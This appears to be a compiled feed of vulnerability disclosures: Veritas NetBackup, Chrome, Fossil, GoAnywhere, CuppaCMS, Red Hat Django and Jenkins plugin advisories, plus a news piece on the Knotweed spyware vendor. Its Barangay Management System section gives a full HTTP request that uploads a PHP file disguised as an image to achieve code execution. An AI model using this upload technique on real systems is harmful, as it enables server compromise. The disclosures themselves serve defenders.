An issue was discovered in Veritas NetBackup 8.1.x through 8.1.2, 8.2, 8.3.x through 8.3.0.2, 9.x through 9.0.0.1, and 9.1.x through 9.1.0.1 (and related NetBackup products). Under certain conditions, an attacker with authenticated access to a NetBackup Client could remotely read files on a NetBackup Primary server.

**Revision History**

*   1.0: July 18: Initial Release

**Summary**

Veritas has addressed multiple security vulnerabilities impacting Veritas NetBackup, NetBackup Appliance, Flex Appliance, and Flex Scale. If you are at an earlier release of NetBackup, you will need to first upgrade to a version where a HotFix is available and then apply the appropriate HotFix. Table 2 of this advisory lists the high-level description. Click the Description hyperlink in Table 2 for more detail on each vulnerability.

**Affected products/versions:**

*   NetBackup 8.1.x, 8.2, 8.3.x, 9.0.x, 9.1.x
*   NetBackup Appliance/NetBackup Virtual Appliance 3.1.x, 3.2, 3.2 MRs, 3.3.0.1, 3.3.0.x MRs, 4.0, 4.0.0.1 MRs, 4.1, 4.1.0.1 MRs
*   NetBackup 8.1.x, 8.2, 8.3.x, 9.0.x, 9.1.x Containers on Flex Appliance 1.3.x, 2.0, 2.0.x, 2.1
*   Flex Scale 1.3.1, 2.1

**HotFixes are available for the following NetBackup versions:**

*   NetBackup 8.1.2, 8.2, 8.3.0.1, 8.3.0.2, 9.0.0.1, 9.1.0.1

**Remedial Actions:**

*   Review Table 1 below to identify your current NetBackup Enterprise software version and follow the remediation steps to apply the HotFix, or upgrade to a version where a fix is available.
*   To fix ALL issues listed below we recommend applying the HotFix to Primary servers as well as all Media servers. This HotFix may be safely applied to all NetBackup Media servers.
*   Flex Appliance customers, please apply the NetBackup HotFix corresponding to the NetBackup Container version on Flex appliances.
*   Flex Scale Appliance customers, please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

_Table 1. Affected Version and Remedial Steps_

NetBackup Version

NetBackup Appliance NetBackup Virtual Appliance

Remediation Steps

8.1.2

3.1.2

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 8.1.2 and Appliance 3.1.2 Master and Media Server

8.2

3.2, 3.2 MR1/MR2/MR3

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 8.2 and Appliance 3.2 Master and Media Server

8.3.0.1

3.3.0.1 MR1/MR2

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 8.3.0.1 and Appliance 3.3.0.1 Primary and Media Servers

8.3.0.2

3.3.0.2 MR1/MR2

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 8.3.0.2 and Appliance 3.3.0.2 Primary and Media Servers

9.0.0.1

4.0.0.1 MR1/MR2/MR3

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 9.0.0.1 and Appliance 4.0.0.1 Primary and Media Server

9.1.0.1

4.1.0.1 MR1/MR2

Apply VTS22-004 - Hotfix for Security Advisory impacting NetBackup 9.1.0.1 and Appliance 4.1.0.1 Primary and Media Server

Pre-8.1.2  

Pre-3.1.2

Upgrade to a newer version and apply NetBackup Hotfix if applicable

8.3

 

Upgrade to a newer version and apply NetBackup Hotfix if applicable

8.3.0.1

3.3.0.1, 3.3.0.1 MR1/MR2/MR3

Upgrade to a newer version and apply NetBackup Hotfix if applicable

9.0

4.0

Upgrade to a newer version and apply NetBackup Hotfix if applicable

9.1

4.1

Upgrade to a newer version and apply NetBackup Hotfix if applicable

10.0

5.0

Not Impacted

_Table 2. Security Issues and Affected Products_

Issue #

Description

Severity

Affected products

Apply HotFix to:

C1

Authenticated Conditional Remote Command Execution

Critical

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

C2

Arbitrary File Write

Critical

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H1

Authenticated Remote Command Execution

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H2

Authenticated Remote Command Execution

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H3

Remote Command Execution

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H4

Arbitrary File Write

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H5  

Arbitrary File Write

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H6

Remote Command Execution

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers, Media Servers

H7

Local Privilege Escalation

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers, Media Servers

H8

Denial of Service

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

H9

Arbitrary File Read

High

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M1

Arbitrary File Read

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M2

Arbitrary File Read

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M3

Denial of Service

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M4

Arbitrary File Read

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M5

Arbitrarily Create Directories

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

M6

Information Leakage

Medium

NetBackup, NetBackup Appliance, Flex Appliance, Flex Scale

Primary Servers

**Critical Issues**

_Issue #C1_

*   Authenticated conditional remote command execution.
*   CVE ID: To Be Assigned
*   Severity: Critical
*   CVSS v3.1 Base Score: 9.9 ( AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely execute arbitrary commands on a NetBackup Primary server given specific notify conditions.

_Issue #C2_

*   Arbitrary file write.
*   CVE ID: To Be Assigned
*   Severity: Critical
*   CVSS v3.1 Base Score: 9.6 (AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely write arbitrary files to arbitrary locations from any Client to any other Client via a Primary server.
*   Note: For this to occur it would require VxSS to be enabled on both the NetBackup Primary server as well as the attacker-controlled NetBackup client.

**High Issues**

_Issue #H1_

*   Remote command execution.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely execute arbitrary commands on a NetBackup Primary server.

_Issue #H2_

*   Remote command execution.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely execute arbitrary commands on a NetBackup Primary server.

_Issue #H3_

*   Remote command execution.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.6 (AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)
*   An attacker with unauthenticated access could remotely execute arbitrary commands on a NetBackup Primary server.

_Issue #H4_

*   Arbitrary file write.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.5 (/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could arbitrarily write files to a NetBackup Primary server.

_Issue #H5_

*   Arbitrary file write.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
*   An attacker with authenticated access to a NetBackup Client could arbitrarily write content to a partially controlled path on a NetBackup Primary server.

_Issue #H6_

*   Remote command execution.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 8.0 (AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)
*   An attacker with authenticated access to a NetBackup OpsCenter server, NetBackup Primary server or NetBackup Media server could remotely execute arbitrary commands on a NetBackup Primary server or NetBackup Media server.

_Issue #H7_

*   Local privilege escalation.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
*   An attacker with unprivileged local access to a Windows NetBackup Primary server could potentially escalate their privileges.

_Issue #H8_

*   Denial of service.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely trigger a denial of service attack against a NetBackup Primary server.

_Issue #H9_

*   Arbitrary file read.
*   CVE ID: To Be Assigned
*   Severity: High
*   CVSS v3.1 Base Score: 7.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)
*   An attacker with authenticated access to a NetBackup Client could remotely trigger an arbitrary file read, Server-Side Request Forgery (SSRF), a denial of service, and potentially other impacts.

**Medium Issues**

_Issue #M1_

*   Arbitrary file read.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
*   Under certain conditions, an attacker with authenticated access to a NetBackup Client could remotely read files on a NetBackup Primary server.

_Issue #M2_

*   Arbitrary file read.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
*   Under certain conditions, an attacker with authenticated access to a NetBackup Client could remotely read files on a NetBackup Primary server.

_Issue #M3_

*   Denial of service.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 6.3 (AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H)
*   An attacker with authenticated access to a NetBackup Client could remotely trigger a stack-based buffer overflow on the NetBackup Primary server, resulting in a denial of service.

_Issue #M4_

*   Arbitrary file read.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 6.3 (AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H)
*   An attacker with authenticated access to a NetBackup Client could arbitrarily read files from a NetBackup Primary server.

_Issue #M5_

*   Arbitrarily create directories.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
*   An attacker with authenticated access to a NetBackup Client could arbitrarily create directories on a NetBackup Primary server.

_Issue #M6_

*   Information leakage.
*   CVE ID: To Be Assigned
*   Severity: Medium
*   CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
*   An attacker with access to a NetBackup Client could remotely gather information about any host known to a NetBackup Primary server.

**Note**

You may also use the NetBackup HotFix and EEB Release Auditor on SORT to check if a previous Emergency Engineering Binary (EEB) or HotFix was delivered in a released product version. This information is also available in the NetBackup Emergency Engineering Binary Guide for that version. If you do not see information related to a HotFix or an EEB you expected, please contact Veritas Technical Support.

**Questions**

For questions or problems regarding these vulnerabilities please contact Veritas Technical Support (https://www.veritas.com/support).

**Acknowledgements**

Veritas would like to thank the following Airbus Security Team members for notifying us about most of these issues: Mouad Abouhali, Benoit Camredon, Nicholas Devillers, Anais Gantet, and Jean-Romain Garnier.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-37000: VTS22-004: HotFix for Security Advisory impacting NetBackup – Primary/Media Server

Insufficient policy enforcement in DevTools in Google Chrome on Windows prior to 103.0.5060.53 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from a user's local files via a crafted HTML page.

CVE-2022-2160

Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 103.0.5060.53 allowed a remote attacker to bypass file system access via a crafted HTML page.

CVE-2022-2162

Fossil 2.18 on Windows allows attackers to cause a denial of service (daemon crash) via an XSS payload in a ticket. This occurs because the ticket data is stored in a temporary file, and the product does not properly handle the absence of this file after Windows Defender has flagged it as malware.

CVE-2022-34009: Fossil: Change Log

A path traversal vulnerability exists within GoAnywhere MFT before 6.8.3 that utilize self-registration for the GoAnywhere Web Client. This vulnerability could potentially allow an external user who self-registers with a specific username and/or profile information to gain access to files at a higher directory level than intended.

CVE-2021-46830: GoAnywhere MFT Release Notes

Microsoft flagged the company's Subzero tool set as on offer to unscrupulous governments and shady business interests.

A cyber-weapons broker dubbed Knotweed has been outed, with Microsoft flagging it as being behind numerous spyware attacks on law firms, banks, and strategic consultancies in countries around the world.

To boot, Knotweed has made a habit of incorporating rafts of Windows and Adobe zero-day exploits into its spyware since at least 2021, according to Microsoft.

Knotweed falls into a murky category of so-called "private sector offensive actors" (PSOAs, aka commercial spyware vendors) that hawk their wares to unscrupulous governments and business interests. These ultrasophisticated (and expensive) tools are often used against dissidents, journalists, and other members of civil society, but they've been known to enable straightforward corporate espionage too.  

**In the Shadows**

The breed is best exemplified by the infamous NSO Group and Pegasus mobile spyware, but many others lurk in the shadows, Microsoft warned.

One such is Knotweed, which is an alias for an Austrian outfit called DSIRF. It's a company that, as Microsoft explained in a post on Wednesday, "ostensibly sells general security and information analysis services to commercial customers." But that's only part of the story, according to the computing giant.

"DSIRF has been linked to the development and attempted sale of a malware toolset called Subzero, which enables customers to hack into their targets' computers, phones, network infrastructure and internet-connected devices," according to the analysis.

The aforementioned Microsoft and Adobe bugs in the tool set (detailed in a technical breakdown) have been seen in recent cyberattacks against targets in Austria, Panama, and the United Kingdom. In addition to publishing software updates to plug the holes on a regular basis, Microsoft has also published a Subzero malware signature for defense.

More action is needed on a broader level, given that DSIRF will not be the last PSOA to come to light, as Microsoft researchers explained in a brief sent to Congress on Wednesday.

"We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms," according to the brief (PDF). "We welcome Congress's focus on the risks and abuses we all collectively face from the unscrupulous use of surveillance technologies and encourage regulation to limit their use both here in the United States and elsewhere around the world."

Multiple Windows, Adobe Zero-Days Anchor Knotweed Commercial Spyware

Barangay Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the module editing function at /pages/activity/activity.php.

Permalink

Cannot retrieve contributors at this time

**Barangay Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**BUG\_AUTHOR**: **whynot37**

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/bmis/pages/activity/activity.php

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Loophole location: Background management system Activity module editing function-> "activity.php" file picture upload point exists arbitrary file upload vulnerability (RCE).

Click "Save" to save

Content-Type: image/png //Key points (Bypass detection by changing "Content Type" to "Content-Type: image/png")

Request package for file upload：

POST /bmis/pages/activity/activity.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/activity/activity.php
Cookie: PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------231533211823565
Content-Length: 625
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_doc"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_act"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_desc"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="files\[\]"; filename="shell.php"
Content-Type: image/png //Key points
JFJF
<?php phpinfo();?>
\-----------------------------231533211823565
Content-Disposition: form-data; name="btn\_add"
Add Activity
\-----------------------------231533211823565--

The files will be uploaded to this directory \\bmis\\pages\\activity\\photo  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-34120: bug_report/RCE-1.md at main · wangsj37/bug_report

Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Local File Inclusion vulnerabilities in CuppaCMS templates****Vulnerability disclosed:  
**

*   CuppaCMS's latest github commit https://github.com/CuppaCMS/CuppaCMS/commit/4c9b742b23b924cf4c1f943f48b278e06a17e297 (dated Nov 12, 2019 ) and before (no version numbers) suffers from Local File Inclusion vulnerability, allowing access to system files. Script '/templates/default/html/windows/right.php' has parameter $\_POST\['url'\] that is not sanitised properly. This allows access to arbitrary files on the server.

**PoC:**

**Solution:  
**

*   TODO

Author: Mateo Hanžek

Reference: CuppaCMS/CuppaCMS#18

CVE-2022-34121: MyExploits/LFI_in_CuppaCMS_templates at main · hansmach1ne/MyExploits

Red Hat Security Advisory 2022-5703-01 - An update is now available for Red Hat Ansible Automation Platform 1.2. Issues addressed include a remote SQL injection vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Ansible Automation Platform 1.2 security update  
Advisory ID:       RHSA-2022:5703-01  
Product:           Red Hat Ansible Automation Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5703  
Issue date:        2022-07-25  
CVE Names:         CVE-2022-28346 CVE-2022-28347   
=====================================================================

1. Summary:

An update is now available for Red Hat Ansible Automation Platform 1.2

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Automation Hub 4.2 for RHEL 7 - noarch  
Red Hat Automation Hub 4.2 for RHEL 8 - noarch

3. Description:

Red Hat Ansible Automation Platform integrates Red Hat’s automation suite  
consisting of Red Hat Ansible Tower, Red Hat Ansible Engine, and use-case  
specific capabilities for Microsoft Windows,network, security, and more,  
along with Software-as-a-Service (SaaS)-based capabilities and features for  
organization-wide effectiveness.

Security Fix(es):

* python3-django: Django: SQL injection in QuerySet.annotate(),aggregate()  
and extra() (CVE-2022-28346)

* python3-django: Django: SQL injection via QuerySet.explain(options) on  
PostgreSQL (CVE-2022-28347)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2072447 - CVE-2022-28346 Django: SQL injection in QuerySet.annotate(),aggregate() and extra()  
2072459 - CVE-2022-28347 Django: SQL injection via QuerySet.explain(options) on PostgreSQL

6. Package List:

Red Hat Automation Hub 4.2 for RHEL 7:

Source:  
python3-django-2.2.28-1.el7pc.src.rpm

noarch:  
python3-django-2.2.28-1.el7pc.noarch.rpm

Red Hat Automation Hub 4.2 for RHEL 8:

Source:  
python3-django-2.2.28-1.el8pc.src.rpm

noarch:  
python3-django-2.2.28-1.el8pc.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-28346  
https://access.redhat.com/security/cve/CVE-2022-28347  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuFjuNzjgjWX9erEAQh/SRAAgwBnMFtj3TNWC+SHf0LPa9GHze+QnHMI  
TUxCC2VYhV/alwQVT36uDpBtRuFj/PjX1Y+4zPmwgqFNkQuoW3eKYTxsQdCqr1SF  
bD08+B7Hrhzt25QC2PAvMKgae/LMhnPqLfNn4BhPYQpburwHIa+18djwfmSpSdEM  
lONbN28j6fbhYEFYM9YS1b7zEE3Cyjcrkg6e4iSm/vyFVIKVANcqXpMD1dgXd41s  
pXgBzS8G+KjE20msnwJUqHuR22l1ScbkQb3HxVnfXge1eONKIRUjjlQz2Yk5JFzD  
f10SjxyrS3/tGInfLd4v6M9yhQMdFzc6ZSoS9JmeDsKuyDojQFCysTeXHGH7eOAj  
ZBDCbLY32FwYuXVknaIDPRCAN8dD7jAWB/N0qxRpfLi3RIQiFFbf9zDNqWwTA9tR  
wabfOa7BXbXdF5jYOruAe1y/MJmb6mHf0M1h/iUJ4jn/g0DzUxrwFzdB6Aqc7Rwo  
IiUrrZEp1c6IZcn+z2Q9AlQpBXzQSS5WUXNQu5+A/MYGS9lTPF4nflYj5C/YOsXP  
mhrwV5VFdEIv7Di7dsYeMWYebbzzR0kIXM6QVqL0Y78pwNfBfqCOLLh049FjNFGL  
9uxW1lOj49wPwzhaovfOlGTN7nXelBv7z/GbBFZ7NzQjUP+e/+oH4rGNXhn4fAon  
jHS9vmLXWAQ=  
=4kJ3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5703-01

Jenkins Repository Connector Plugin 2.2.0 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 27 Jul 2022 15:48:59 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Compuware ISPW Operations Plugin 1.0.9
\* Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.13
\* Compuware Topaz Utilities Plugin 1.0.9
\* Compuware Xpediter Code Coverage Plugin 1.0.8
\* Compuware zAdviser API Plugin 1.0.4
\* Deployer Framework Plugin 86.v7b\_a\_4a\_55b\_f3ec
\* External Monitor Job Type Plugin 192.ve979ca\_8b\_3ccd
\* Git client Plugin 3.11.1
\* Git Plugin 4.11.4
\* GitHub Plugin 1.34.5
\* HashiCorp Vault Plugin 355.v3b\_38d767a\_b\_a\_8
\* Job Configuration History Plugin 1156.v536a\_97b\_8d649
\* rhnpush-plugin Plugin 0.5.2
\* rpmsign-plugin Plugin 0.5.1

Additionally, we announce unresolved security issues in the following
plugins:

\* Android Signing Plugin
\* Buckminster Plugin
\* CLIF Performance Testing Plugin
\* Coverity Plugin
\* Dynamic Extended Choice Parameter Plugin
\* Files Found Trigger Plugin
\* Google Cloud Backup Plugin
\* HTTP Request Plugin
\* Lucene-Search Plugin
\* Maven Metadata Plugin for Jenkins CI server Plugin
\* OpenShift Deployer Plugin
\* Openstack Heat Plugin
\* Repository Connector Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-07-27/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-1468 / CVE-2022-36881
Git client Plugin 3.11.0 and earlier does not perform SSH host key
verification when connecting to Git repositories via SSH.

This lack of verification could be abused using a man-in-the-middle attack
to intercept these connections.


SECURITY-284 / CVE-2022-36882 (CSRF) & CVE-2022-36883 (permission check) &
CVE-2022-36884 (information disclosure)
Git Plugin provides a webhook endpoint at \`/git/notifyCommit\` that can be
used to notify Jenkins of changes to an SCM repository. For its most basic
functionality, this endpoint receives a repository URL, and Jenkins will
schedule polling for all jobs configured with the specified repository. In
Git Plugin 4.11.3 and earlier, this endpoint can be accessed with GET
requests and without authentication.

In addition to this basic functionality, the endpoint also accept a \`sha1\`
parameter specifying a commit ID. If this parameter is specified, jobs
configured with the specified repo will be triggered immediately, and the
build will check out the specified commit.

Additionally, the output of the webhook endpoint will provide information
about which jobs were triggered or scheduled for polling, including jobs
the user has no permission to access.

This allows attackers with knowledge of Git repository URLs to trigger
builds of jobs using a specified Git repository and to cause them to check
out an attacker-specified commit, and to obtain information about the
existence of jobs configured with this Git repository.

Additionally, this webhook endpoint does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.


SECURITY-1849 / CVE-2022-36885
GitHub Plugin 1.34.4 and earlier does not use a constant-time comparison
when checking whether the provided and computed webhook signatures are
equal.

This could potentially allow attackers to use statistical methods to obtain
a valid webhook signature.


SECURITY-2762 / CVE-2022-36886
External Monitor Job Type Plugin 191.v363d0d1efdf8 and earlier does not
require POST requests for an HTTP endpoint, resulting in a cross-site
request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create runs of an external job.


SECURITY-2766 / CVE-2022-36887
Job Configuration History Plugin 1155.v28a\_46a\_cc06a\_5 and earlier does not
require POST requests for several HTTP endpoints, resulting in cross-site
request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to delete entries from job, agent,
and system configuration history, or restore older versions of job, agent,
and system configurations.


SECURITY-2593 / CVE-2022-36888
HashiCorp Vault Plugin 354.vdb\_858fd6b\_f48 and earlier does not perform
permission checks in several HTTP endpoints performing Vault connection
tests.

This allows attackers with Overall/Read permission to obtain credentials
stored in Vault with attacker-specified path and keys.


SECURITY-2764 / CVE-2022-36889
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the application path of the applications when configuring a deployment.

This allows attackers with Item/Configure permission to upload arbitrary
files from the Jenkins controller file system to the selected service.


SECURITY-2206 / CVE-2022-36890
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the name of files in methods implementing form validation.

This allows attackers with Item/Read permission to check for the existence
of an attacker-specified file path on the Jenkins controller file system.


SECURITY-2205 / CVE-2022-36891
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not perform a
permission check in an HTTP endpoint.

This allows attackers with Item/Read permission to read deployment logs.


SECURITY-2402 / CVE-2022-36892
rhnpush-plugin Plugin 0.5.1 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2403 / CVE-2022-36893
rpmsign-plugin Plugin 0.5.0 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2413 / CVE-2022-36894
CLIF Performance Testing Plugin 64.vc0d66de1dfb\_f and earlier allows users
to extract files from an archive without validating file paths of files
contained within the archive.

This allows attackers with Overall/Read permission to create or replace
arbitrary files on the Jenkins controller file system with
attacker-specified content.

As of publication of this advisory, there is no fix.


SECURITY-2619 / CVE-2022-36895
Compuware Topaz Utilities Plugin 1.0.8 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2621 / CVE-2022-36896
Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.12 and
earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2626 / CVE-2022-36897
Compuware Xpediter Code Coverage Plugin 1.0.7 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2628 / CVE-2022-36898
Compuware ISPW Operations Plugin 1.0.8 and earlier does not perform
